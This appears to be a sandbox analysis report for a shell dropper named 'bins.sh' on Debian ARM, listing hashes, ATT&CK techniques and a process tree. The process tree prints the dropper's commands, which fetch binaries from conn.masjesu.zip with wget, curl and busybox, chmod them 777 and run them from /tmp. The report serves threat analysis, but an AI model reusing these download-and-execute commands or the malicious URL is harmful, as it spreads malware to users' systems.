Analysis
-
max time kernel
150s -
max time network
10s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
27-10-2024 05:22
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
85d74baef7ce93fd942b1abca31bf2dd
-
SHA1
a7e677437c07ce76e9242021261bc10ae3c1728e
-
SHA256
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1
-
SHA512
01166c5328b88a37c6f813c2c230bfb8ab099386a4d9d45d663902833009e012859aa7452ea9d9bff524dc0bf6f3dd938c0df0225b65ece29ab5a364e10a5677
-
SSDEEP
192:ffd11BAjT2qH0+mhJy/EN71BAjTx9wrKS:ffdJqU+mhJy/ENqyrKS
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 698 chmod -
Executes dropped EXE 1 IoCs
Processes:
5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7dioc pid process /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d 699 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d -
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
curlwgetcurlbusyboxwgetpid process 706 curl 676 wget 684 curl 696 busybox 704 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curldescription ioc process File opened for modification /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:666
-
/bin/rm/bin/rm bins.sh2⤵PID:674
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:676 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:684 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:696 -
/bin/chmodchmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- File and Directory Permissions Modification
PID:698 -
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Executes dropped EXE
PID:699 -
/bin/rmrm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:702
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:704 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:706
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
84KB
MD564ece99ca4ab1c1405f5a3335d64a960
SHA1b7395f2320a5bdadb78943b268708965cdbd1d74
SHA256aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
SHA512bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41